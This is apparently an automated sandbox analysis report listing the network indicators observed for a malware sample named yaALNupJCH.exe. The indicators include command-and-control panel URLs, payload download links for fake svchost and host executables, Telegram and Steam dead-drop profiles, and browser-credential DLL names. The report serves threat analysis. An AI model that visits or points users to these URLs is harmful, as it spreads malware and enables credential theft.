                                http://95.141.41.12/n9kd3X/index.phpY0%Avira URL Cloudsafe
                                http://transdi.org/svchost.dll100%Avira URL Cloudmalware
                                http://95.141.41.12/n9kd3X/index.php_0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpx/svchost.exe0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpff.info50%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phph0%Avira URL Cloudsafe
                                http://pixcode.com.mx/svchost.exews;0%Avira URL Cloudsafe
                                http://transdi.org/svchost.dll0%VirustotalBrowse
                                http://95.141.41.12/n9kd3X/index.phpn0%Avira URL Cloudsafe
                                http://geoplugin.net/json.gpPrg0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.php:A0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phptch0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpq0%Avira URL Cloudsafe
                                http://pixcode.com.mx/svchost.exe0%Avira URL Cloudsafe
                                http://116.202.2.169:1333/al0%Avira URL Cloudsafe
                                http://95.141.41.12/n9g9ecOb3jd/index.php0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpVg0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.php1mb3JtLXVybGVuY29kZWQ=0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phptc0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpion0%Avira URL Cloudsafe
                                http://116.202.2.169:1333/0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.php0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpcodedRq0%Avira URL Cloudsafe
                                http://95.141.41.12/n9-k0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.php0%Avira URL Cloudsafe
                                http://geoplugin.net/json.gp_0%Avira URL Cloudsafe
                                http://mardukoff.info/kd3X/index.php0%Avira URL Cloudsafe
                                81.19.131.360%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpOn0%Avira URL Cloudsafe
                                http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
                                http://geoplugin.net/json.gpp0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpded0%Avira URL Cloudsafe
                                http://pixcode.com.mx/svchost.exe4g0%Avira URL Cloudsafe
                                http://95.P0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpPb0%Avira URL Cloudsafe
                                http://mardukoff.info/0%Avira URL Cloudsafe
                                http://transdi.org/host.exe100%Avira URL Cloudmalware
                                http://95.141.41.12/n9kd3X/index.phpkernelbase.dll0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpHb0%Avira URL Cloudsafe
                                http://geoplugin.net/json.gp0%Avira URL Cloudsafe
                                mardukoff.info/g9ecOb3jd/index.php0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpcoded0%Avira URL Cloudsafe
                                https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll0%Avira URL Cloudsafe
                                http://transdi.org/host.exe=o100%Avira URL Cloudmalware
                                http://95.141.41.12/n90%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phprg0%Avira URL Cloudsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                transdi.org
                                157.90.36.211
                                truefalseunknown
                                geoplugin.net
                                178.237.33.50
                                truefalseunknown
                                t.me
                                149.154.167.99
                                truefalse
                                  high
                                  pixcode.com.mx
                                  192.185.131.188
                                  truefalse
                                    unknown
                                    mardukoff.info
                                    127.0.0.127
                                    truetrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://116.202.2.169:1333/temp.zipfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://steamcommunity.com/profiles/76561199555780195false
                                        high
                                        http://transdi.org/svchost.dllfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://pixcode.com.mx/svchost.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://116.202.2.169:1333/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://95.141.41.12/n9kd3X/index.phptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        81.19.131.36true
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://t.me/solonichatfalse
                                          high
                                          http://transdi.org/host.exefalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://geoplugin.net/json.gpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          mardukoff.info/g9ecOb3jd/index.phptrue
                                          • Avira URL Cloud: safe
                                          low
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabyaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drfalse
                                            high
                                            http://95.141.41.12/n9kd3X/index.phpespaceyaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://95.141.41.12/n9kd3X/index.php9yaALNupJCH.exe, 00000000.00000003.945842153.000000000157A000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.945829879.000000000156A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://duckduckgo.com/ac/?q=12600711246403711407151220.3.drfalse
                                              high
                                              https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googleyaALNupJCH.exe, 00000003.00000003.895202513.000000000EBBC000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.drfalse
                                                high
                                                http://95.141.41.12/n9kd3X/index.phpEyaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://geoplugin.net/json.gpp8yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://transdi.org/host.exe3jd/index.php0cyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://pixcode.com.mx/svchost.exexgyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://116.202.2.169:1333/tyaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://pixcode.com.mx/svchost.exeVyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://mardukoff.info/g9ecOb3jd/index.phpNqyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://transdi.org/host.exeZyaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://geoplugin.net/json.gp/CyaALNupJCH.exe, 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost[1].exe.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://95.141.41.12/n9kd3X/index.phpspaceyaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://mardukoff.info/g9ecOb3jd/index.phpkyaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://t.me/solonichatCAyaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://mardukoff.info/g9ecOb3jd/index.phpodqyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://95.141.41.12/n9kd3X/index.php(yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://95.141.41.12/n9kd3X/index.phpatchyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://95.141.41.12/n9kd3X/index.php1yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://95.141.41.12/n9kd3X/index.phpRsyaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://geoplugin.net/json.gponyaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://95.141.41.12/n9kd3X/index.phpvyaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=12600711246403711407151220.3.drfalse
                                                    high
                                                    https://steamcommunity.com/profiles/76561199555780195update.zipopenopen_NULL%syaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drfalse
                                                      high
                                                      http://mardukoff.info/g9ecOb3jd/index.phpdqyaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://pixcode.com.mx/svchost.exeatyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://pixcode.com.mx/svchost.exerdyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.ecosia.org/newtab/yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drfalse
                                                        high
                                                        http://transdi.org/host.exe8yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drfalse
                                                          high
                                                          http://transdi.org/host.exe5yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://95.141.41.12/n9kd3X/index.phpUyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://95.141.41.12/n9kd3X/index.phpYyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://95.141.41.12/n9kd3X/index.php_yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://95.141.41.12/n9kd3X/index.phpx/svchost.exeyaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://95.141.41.12/n9kd3X/index.phpff.info5yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://95.141.41.12/n9kd3X/index.phphyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://pixcode.com.mx/svchost.exews;yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://95.141.41.12/n9kd3X/index.phpnyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://geoplugin.net/json.gpPrgyaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://t.me/solonichatMAyaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://95.141.41.12/n9kd3X/index.phpqyaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://116.202.2.169:1333/TyaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://t.me/solonichatwFyaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://t.me/yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://web.telegram.orgyaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://mardukoff.info/g9ecOb3jd/index.php:AyaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://95.141.41.12/n9kd3X/index.phptchyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.google.com/search?q=.net40080133769305826732791000.3.drfalse
                                                                      high
                                                                      http://116.202.2.169:1333/alyaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://95.141.41.12/n9g9ecOb3jd/index.phpyaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.com/intl/en_uk/chrome/yaALNupJCH.exe, 00000003.00000002.910498852.000000000EEB6000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.drfalse
                                                                        high
                                                                        http://95.141.41.12/n9kd3X/index.phpVgyaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://mardukoff.info/g9ecOb3jd/index.php1mb3JtLXVybGVuY29kZWQ=yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://mardukoff.info/g9ecOb3jd/index.phptcyaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://95.141.41.12/n9kd3X/index.phpionyaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://mardukoff.info/g9ecOb3jd/index.phpyaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://mardukoff.info/g9ecOb3jd/index.phpcodedRqyaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3D40080133769305826732791000.3.drfalse
                                                                          high
                                                                          http://95.141.41.12/n9-kyaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://geoplugin.net/json.gp_yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.sqlite.org/copyright.html.yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://mardukoff.info/kd3X/index.phpyaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025833709.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025867465.0000000001573000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://mardukoff.info/g9ecOb3jd/index.phpOnyaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171038808.000000000155D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoyaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drfalse
                                                                              high
                                                                              http://geoplugin.net/json.gplyaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA51372752844971756591089692.3.dr, 40080133769305826732791000.3.drfalse
                                                                                high
                                                                                http://geoplugin.net/json.gppyaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://mardukoff.info/g9ecOb3jd/index.phpdedyaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://pixcode.com.mx/svchost.exe4gyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                                                  high
                                                                                  http://95.PyaALNupJCH.exe, 00000000.00000003.1302659925.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001584000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.0000000001580000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchyaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drfalse
                                                                                    high
                                                                                    http://mardukoff.info/g9ecOb3jd/index.phpPbyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&40080133769305826732791000.3.drfalse
                                                                                      high
                                                                                      http://mardukoff.info/yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://95.141.41.12/n9kd3X/index.phpkernelbase.dllyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://mardukoff.info/g9ecOb3jd/index.phpHbyaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dllyaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
